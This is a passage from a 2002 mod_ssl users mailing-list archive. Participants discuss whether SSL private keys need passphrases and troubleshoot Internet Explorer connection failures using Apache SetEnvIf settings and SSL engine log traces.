en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id OAA05510; Wed, 6 Feb 2002 14:04:01 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g16D2qh00928 for ; Wed, 6 Feb 2002 08:02:52 -0500 Date: Wed, 6 Feb 2002 08:02:52 -0500 (EST) From: Cliff Woolley X-X-Sender: To: Subject: Re: How do I create a un-encrypted private key (without pass phrase)? In-Reply-To: <3C610DD3.E26044FF@bourse.ch> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, 6 Feb 2002, Owen Boyle wrote: > Having a password means that no-one can use your certificate - even if > they obtain a copy of it. They can load the cert into their server but > it won't let the server come up unless they know the password. > > The downside is that you have to type in the password personally to > start apache. Tricks like putting the password in a program and so on > just shift the risk - the hacker just needs to grab the program. > > My personal tuppence-worth is that if you have a machine where there is > a risk that hackers can steal root-privileged files then you should not > be running it as an SSL web-server (if they can steal a cert, they can > steal your customer's private data - exposing you to a liability issue). > So if you protect your server to the utmost, you have no need of a > password protected certificate. s/certificate/private key/g, and this matches my sentiments exactly. Passphrases just give a false sense of security. --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 14:18:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA06037; Wed, 6 Feb 2002 14:17:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pingu.awe.com id OAA06000; Wed, 6 Feb 2002 14:16:17 +0100 (MET) Received: from localhost ([127.0.0.1]) by pingu.awe.com with esmtp (Exim 3.22 #2) id 16YS3E-0003mJ-00 for modssl-users@modssl.org; Wed, 06 Feb 2002 13:23:52 +0000 Date: Wed, 6 Feb 2002 13:23:52 +0000 (GMT) From: Mark J Cox To: Subject: Re: How do I create a un-encrypted private key (without pass phrase)? In-Reply-To: <3C610DD3.E26044FF@bourse.ch> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mark J Cox X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Having a password means that no-one can use your certificate - even if > they obtain a copy of it. They can load the cert into their server but > it won't let the server come up unless they know the password. Although after accepting a passphrase the unencrypted key is sitting in memory in the web server (it has to be so that it can be used to accept new connections). If you can dump the memory of a process (root can do this on a lot of UNIX systems, on others you can do it from a CGI run as the user Apache is running as) then you can grab the key without a lot of effort. > So if you protect your server to the utmost, you have no need of a > password protected certificate. Absolutely; if someone is root on your system they're going to get the key if they want it. Adding a passphrase isn't going to stop them, and is just going to make it more annoying for you to use your server. (This is where the hardware crypto device people chime in and tell you about their systems that let you keep the keys in external, FIPS-compliant, hardware) Mark -- Mark J Cox ........................................... www.awe.com/mark Apache Software Foundation ..... OpenSSL Group ..... Apache Week editor ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 15:51:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA09465; Wed, 6 Feb 2002 15:50:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id PAA09455; Wed, 6 Feb 2002 15:50:03 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g16Emin00256 for ; Wed, 6 Feb 2002 09:48:44 -0500 Date: Wed, 6 Feb 2002 09:48:44 -0500 (EST) From: Cliff Woolley X-X-Sender: To: Subject: duplicate message delivery Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I've been seeing duplicate deliveries of messages to the list from mmx.engelschall.com for the last few days... Ralf, can you check on this when you get a chance? Thanks, --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 16:11:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA10599; Wed, 6 Feb 2002 16:10:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from plmler3.mail.eds.com id QAA10535; Wed, 6 Feb 2002 16:09:09 +0100 (MET) Received: from plmlir4.mail.eds.com (plmlir4-2.mail.eds.com [199.228.143.135]) by plmler3.mail.eds.com (8.11.6/8.11.3) with ESMTP id g16F97A22541 for ; Wed, 6 Feb 2002 09:09:07 -0600 Received: from plmlir4.mail.eds.com (localhost [127.0.0.1]) by plmlir4.mail.eds.com (8.11.6/8.11.3) with ESMTP id g16F95j14029 for ; Wed, 6 Feb 2002 09:09:05 -0600 (CST) Received: from usplm001.exch.eds.com (USPLM001.txpln.us.eds.com [198.132.135.6]) by plmlir4.mail.eds.com (8.11.6/8.11.3) with ESMTP id g16F95D14016 for ; Wed, 6 Feb 2002 09:09:05 -0600 (CST) Received: by USPLM001.txpln.us.eds.com with Internet Mail Service (5.5.2655.51) id ; Wed, 6 Feb 2002 09:09:01 -0600 Message-ID: <8A87A19E6153D4119FA800508BDF0932E0E30D@USHEM202> From: "Kuczborski, Carol L" To: "'modssl-users@modssl.org'" Subject: RE: Problem with IE Date: Wed, 6 Feb 2002 09:08:59 -0600 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.51) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kuczborski, Carol L" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Try the following setting for the IE browser in the httpd.conf file. I know it is the recommendation made in the mod_ssl FAQ, but it seemed to help me. I had the same problem you are having and researched it for months. After making the change to the http.conf below (and applying a patch from Oracle to the ApacheModuleSSL.dll file on Windows NT), it reduced the intermittent "Cannot find server or DNS error" and "Page cannot be displayed" messages received when using the IE browser. I never received these errors when using the Netscape browser. SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown Carol Kuczborski EDS - Enabling Business Solutions MS A6N-B47 13600 EDS Drive Herndon, VA 20171 * phone: +01-703-742-1025 (8-432) * mailto:carol.kuczborski@eds.com www.eds.com -----Original Message----- From: Thomas Lepik [mailto:walker@jalutaja.ee] Sent: Wednesday, February 06, 2002 3:48 AM To: modssl-users@modssl.org Subject: Problem with IE Hello, I compiled apache-1.3.2+mod_ssl-2.8.6+php-4.1.1 sucessfully on RH 7.2 Linux. I created certificates, modified httpd.conf for my needs and started apache with ssl option. Things seemed to be working fine - even tested with lynx browser to see wheather https://localhost gives a connection - and it did! But when tested with M$ IE 5.0 (with high encryption patch that allows 128 bit chipher), I constantly ran into "page cannot be displayed" - eventhough I modified httpd.conf's SSL section several times as suggested here before. (if IE setenv xxx and, SSL -v3, session cache things) Any time - lynx displays the page and IE doesn't. Here are two samples from my ssl_engine_log. First one with lynx browser, second one with my troublesome IE. (also included server startup lines to ensure that server is running smoothly) server startup: ----------------- 06/Feb/2002 10:29:06 09923] [info] Init: Configuring server emedia.se:443 for SSL protocol [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP] [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA server certificate [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA server private key [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring server certificate chain (1 CA certificate) ------------- Lynx browser: ---------------- [06/Feb/2002 10:29:41 09924] [info] Connection to child 0 established (server emedia.se:443, client 212.107.xx.xx) [06/Feb/2002 10:29:41 09924] [info] Seeding PRNG with 23177 bytes of entropy [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Handshake: start [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: before/accept initialization [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 read client hello A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server hello A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write certificate A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write key exchange A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server done A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read client key exchange A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read finished A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write finished A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:29:42 09924] [trace] Inter-Process Session Cache: request=SET status=OK id=6ACADD8B778A6BFFDF0E22CCC0023F4B080C297422FA989923FC36348E3FFD83 timeout=599s (session caching) [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Handshake: done [06/Feb/2002 10:29:42 09924] [info] Connection: Client IP: 212.107.xx.xx, Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA (168/168 bits) [06/Feb/2002 10:29:42 09924] [info] Initial (No.1) HTTPS request received for child 0 (server emedia.se:443) [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Write: SSL negotiation finished successfully [06/Feb/2002 10:29:42 09924] [info] Connection to child 0 closed with standard shutdown (server emedia.se:443, client 212.107.xx.xx) -------------- Now with IE --------------- Connection to child 1 established (server emedia.se:443, client 212.107.xx.xx) [06/Feb/2002 10:32:37 09925] [info] Seeding PRNG with 23177 bytes of entropy [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: start [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: before/accept initialization [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client hello A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server hello A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write certificate A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server done A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client key exchange A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read finished A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write finished A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:32:37 09925] [trace] Inter-Process Session Cache: request=SET st atus=OK id=C52B666B384B0E4DD7F0BDB6D6F8E8118E3AA5748DF993A553C4CC4E2FB86606 timeout=600s (session caching) [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: done [06/Feb/2002 10:32:37 09925] [info] Connection: Client IP: 212.107.xx.xx, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Write: SSL negotiation finished successfully [06/Feb/2002 10:32:37 09925] [info] Connection to child 1 closed with standard shutdown (server emedia.se:443, client 212.107.xx.xx) ---------- Best regards, Thomas. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 16:30:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA11370; Wed, 6 Feb 2002 16:29:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ahmler3.mail.eds.com id QAA11348; Wed, 6 Feb 2002 16:28:58 +0100 (MET) Received: from ahmlir1.mail.eds.com (ahmlir1-2.mail.eds.com [192.85.154.25]) by ahmler3.mail.eds.com (8.11.6/8.11.3) with ESMTP id g16FStW30376 for ; Wed, 6 Feb 2002 10:28:56 -0500 Received: from ahmlir1.mail.eds.com (localhost [127.0.0.1]) by ahmlir1.mail.eds.com (8.11.6/8.11.3) with ESMTP id g16FSrL03696 for ; Wed, 6 Feb 2002 10:28:54 -0500 (EST) Received: from usahm002.exch.eds.com (usahm002.examhub.exch.eds.com [207.37.138.139]) by ahmlir1.mail.eds.com (8.11.6/8.11.3) with ESMTP id g16FSrb03692 for ; Wed, 6 Feb 2002 10:28:53 -0500 (EST) Received: by usahm002.examhub.exch.eds.com with Internet Mail Service (5.5.2655.51) id ; Wed, 6 Feb 2002 10:28:55 -0500 Message-ID: <8A87A19E6153D4119FA800508BDF0932E0E311@USHEM202> From: "Kuczborski, Carol L" To: "'modssl-users@modssl.org'" Subject: RE: Problem with IE Date: Wed, 6 Feb 2002 10:28:50 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.51) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kuczborski, Carol L" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sorry, it is NOT the recommendation made in mod_ssl.... But it worked for me. Carol Kuczborski EDS - Enabling Business Solutions MS A6N-B47 13600 EDS Drive Herndon, VA 20171 * phone: +01-703-742-1025 (8-432) * mailto:carol.kuczborski@eds.com www.eds.com -----Original Message----- From: Kuczborski, Carol L Sent: Wednesday, February 06, 2002 10:09 AM To: 'modssl-users@modssl.org' Subject: RE: Problem with IE Try the following setting for the IE browser in the httpd.conf file. I know it is the recommendation made in the mod_ssl FAQ, but it seemed to help me. I had the same problem you are having and researched it for months. After making the change to the http.conf below (and applying a patch from Oracle to the ApacheModuleSSL.dll file on Windows NT), it reduced the intermittent "Cannot find server or DNS error" and "Page cannot be displayed" messages received when using the IE browser. I never received these errors when using the Netscape browser. SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown Carol Kuczborski EDS - Enabling Business Solutions MS A6N-B47 13600 EDS Drive Herndon, VA 20171 * phone: +01-703-742-1025 (8-432) * mailto:carol.kuczborski@eds.com www.eds.com -----Original Message----- From: Thomas Lepik [mailto:walker@jalutaja.ee] Sent: Wednesday, February 06, 2002 3:48 AM To: modssl-users@modssl.org Subject: Problem with IE Hello, I compiled apache-1.3.2+mod_ssl-2.8.6+php-4.1.1 sucessfully on RH 7.2 Linux. I created certificates, modified httpd.conf for my needs and started apache with ssl option. Things seemed to be working fine - even tested with lynx browser to see wheather https://localhost gives a connection - and it did! But when tested with M$ IE 5.0 (with high encryption patch that allows 128 bit chipher), I constantly ran into "page cannot be displayed" - eventhough I modified httpd.conf's SSL section several times as suggested here before. (if IE setenv xxx and, SSL -v3, session cache things) Any time - lynx displays the page and IE doesn't. Here are two samples from my ssl_engine_log. First one with lynx browser, second one with my troublesome IE. (also included server startup lines to ensure that server is running smoothly) server startup: ----------------- 06/Feb/2002 10:29:06 09923] [info] Init: Configuring server emedia.se:443 for SSL protocol [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP] [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA server certificate [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA server private key [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring server certificate chain (1 CA certificate) ------------- Lynx browser: ---------------- [06/Feb/2002 10:29:41 09924] [info] Connection to child 0 established (server emedia.se:443, client 212.107.xx.xx) [06/Feb/2002 10:29:41 09924] [info] Seeding PRNG with 23177 bytes of entropy [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Handshake: start [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: before/accept initialization [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 read client hello A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server hello A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write certificate A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write key exchange A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server done A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read client key exchange A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read finished A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write finished A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:29:42 09924] [trace] Inter-Process Session Cache: request=SET status=OK id=6ACADD8B778A6BFFDF0E22CCC0023F4B080C297422FA989923FC36348E3FFD83 timeout=599s (session caching) [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Handshake: done [06/Feb/2002 10:29:42 09924] [info] Connection: Client IP: 212.107.xx.xx, Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA (168/168 bits) [06/Feb/2002 10:29:42 09924] [info] Initial (No.1) HTTPS request received for child 0 (server emedia.se:443) [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Write: SSL negotiation finished successfully [06/Feb/2002 10:29:42 09924] [info] Connection to child 0 closed with standard shutdown (server emedia.se:443, client 212.107.xx.xx) -------------- Now with IE --------------- Connection to child 1 established (server emedia.se:443, client 212.107.xx.xx) [06/Feb/2002 10:32:37 09925] [info] Seeding PRNG with 23177 bytes of entropy [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: start [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: before/accept initialization [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client hello A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server hello A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write certificate A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server done A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client key exchange A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read finished A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write finished A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:32:37 09925] [trace] Inter-Process Session Cache: request=SET st atus=OK id=C52B666B384B0E4DD7F0BDB6D6F8E8118E3AA5748DF993A553C4CC4E2FB86606 timeout=600s (session caching) [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: done [06/Feb/2002 10:32:37 09925] [info] Connection: Client IP: 212.107.xx.xx, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Write: SSL negotiation finished successfully [06/Feb/2002 10:32:37 09925] [info] Connection to child 1 closed with standard shutdown (server emedia.se:443, client 212.107.xx.xx) ---------- Best regards, Thomas. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 17:05:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA13031; Wed, 6 Feb 2002 17:04:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.expertrade.com id RAA12807; Wed, 6 Feb 2002 17:03:41 +0100 (MET) Received: from reggae (reggae.expertrade.com [216.122.43.90]) by mail1.expertrade.com (8.9.3/8.9.3) with ESMTP id IAA32396 for ; Wed, 6 Feb 2002 08:03:40 -0800 Message-ID: <0bcd01c1af27$e00b3220$5a2b7ad8@expertrade.com> From: "David Wall" To: References: <8A87A19E6153D4119FA800508BDF0932E0E30D@USHEM202> Subject: Re: Problem with IE Date: Wed, 6 Feb 2002 08:03:53 -0800 Organization: Yozons, Inc. MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "David Wall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > to the ApacheModuleSSL.dll file on Windows NT), it reduced the intermittent > "Cannot find server or DNS error" and "Page cannot be displayed" messages > received when using the IE browser. I never received these errors when > using the Netscape browser. I'd be interested to know if the mod-ssl config change solves this because I read a Nov 2001 article in Computer Technology Review that says, and I quote: "Internet Explorer sometimes drops SSL sessions after very short time outs -- resulting in lost SSL connections for users. To compensate for this, the load balancer portion of the integrated device should be able to decrypt the user cookie, make the correct traffic management decision, and send the request to the right server. Through this process, Internet Explorer can renegotiate the SSL session ID as many times as it likes -- and the user still ends up in the right place. This is especially useful for long-lived sessions (e.g. financial applications), since the cookie lives on hte user system and does not consume memory on the load balancer." What is all means, I'm still not sure. I, too, have seen sessions get lost, often very soon after establishing a session, resulting not in your error, but in a relogin scenario, as if the actual 'session cookie' itself was somehow getting lost in the SSL negotiation described (yes, I know the SSL session id is distinct from the cookie session id for maintain web server user sessions). David ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 19:14:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA20416; Wed, 6 Feb 2002 19:13:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from emmy.tvdata.com id TAA20395; Wed, 6 Feb 2002 19:13:00 +0100 (MET) Received: from tvdata.com (tvdgauntlet.tvdata.com [172.19.10.23]) by emmy.tvdata.com (8.11.1/8.11.1) with SMTP id g16IADE24812 for ; Wed, 6 Feb 2002 13:10:13 -0500 (EST) Received: from SMTP agent by mail gateway Wed, 06 Feb 2002 13:08:22 -0500 Message-ID: <3C617216.4070401@tvdata.com> Date: Wed, 06 Feb 2002 13:12:38 -0500 From: Shain Miley User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:0.9.5) Gecko/20011027 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Problem with IE References: <8A87A19E6153D4119FA800508BDF0932E0E311@USHEM202> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shain Miley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I fixed a problem this morning by adding this line to my httpd.conf file: SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 Shain Kuczborski, Carol L wrote: >Sorry, it is NOT the recommendation made in mod_ssl.... But it worked for >me. > >Carol Kuczborski >EDS - Enabling Business Solutions >MS A6N-B47 >13600 EDS Drive >Herndon, VA 20171 > >* phone: +01-703-742-1025 (8-432) >* mailto:carol.kuczborski@eds.com >www.eds.com > > > >-----Original Message----- >From: Kuczborski, Carol L >Sent: Wednesday, February 06, 2002 10:09 AM >To: 'modssl-users@modssl.org' >Subject: RE: Problem with IE > > >Try the following setting for the IE browser in the httpd.conf file. I know >it is the recommendation made in the mod_ssl FAQ, but it seemed to help me. >I had the same problem you are having and researched it for months. After >making the change to the http.conf below (and applying a patch from Oracle >to the ApacheModuleSSL.dll file on Windows NT), it reduced the intermittent >"Cannot find server or DNS error" and "Page cannot be displayed" messages >received when using the IE browser. I never received these errors when >using the Netscape browser. > >SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown > >Carol Kuczborski >EDS - Enabling Business Solutions >MS A6N-B47 >13600 EDS Drive >Herndon, VA 20171 > >* phone: +01-703-742-1025 (8-432) >* mailto:carol.kuczborski@eds.com >www.eds.com > > > >-----Original Message----- >From: Thomas Lepik [mailto:walker@jalutaja.ee] >Sent: Wednesday, February 06, 2002 3:48 AM >To: modssl-users@modssl.org >Subject: Problem with IE > > >Hello, > >I compiled apache-1.3.2+mod_ssl-2.8.6+php-4.1.1 sucessfully on RH 7.2 Linux. > >I created certificates, modified httpd.conf for my needs and started apache >with ssl option. >Things seemed to be working fine - even tested with lynx browser to see >wheather https://localhost >gives a connection - and it did! But when tested with M$ IE 5.0 (with high >encryption patch >that allows 128 bit chipher), I constantly ran into "page cannot be >displayed" - eventhough >I modified httpd.conf's SSL section several times as suggested here before. >(if IE setenv xxx and, >SSL -v3, session cache things) Any time - lynx displays the page and IE >doesn't. > >Here are two samples from my ssl_engine_log. First one with lynx browser, >second one with my >troublesome IE. (also included server startup lines to ensure that server is >running smoothly) > >server startup: >----------------- >06/Feb/2002 10:29:06 09923] [info] Init: Configuring server emedia.se:443 >for SSL protocol >[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Creating new SSL >context (protocols: SSLv2, SSLv3, TLSv1) >[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring >permitted SSL ciphers >[ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP] >[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA >server certificate >[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA >server private key >[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring >server certificate chain (1 CA certificate) >------------- > >Lynx browser: >---------------- >[06/Feb/2002 10:29:41 09924] [info] Connection to child 0 established >(server emedia.se:443, client 212.107.xx.xx) >[06/Feb/2002 10:29:41 09924] [info] Seeding PRNG with 23177 bytes of >entropy >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Handshake: start >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: before/accept >initialization >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 read client hello >A >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server hello >A >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write certificate >A >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write key exchange >A >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server done >A >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 flush data >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read client key >exchange A >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read finished A >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write change >cipher spec A >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write finished A >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 flush data >[06/Feb/2002 10:29:42 09924] [trace] Inter-Process Session Cache: >request=SET status=OK >id=6ACADD8B778A6BFFDF0E22CCC0023F4B080C297422FA989923FC36348E3FFD83 >timeout=599s (session caching) >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Handshake: done >[06/Feb/2002 10:29:42 09924] [info] Connection: Client IP: 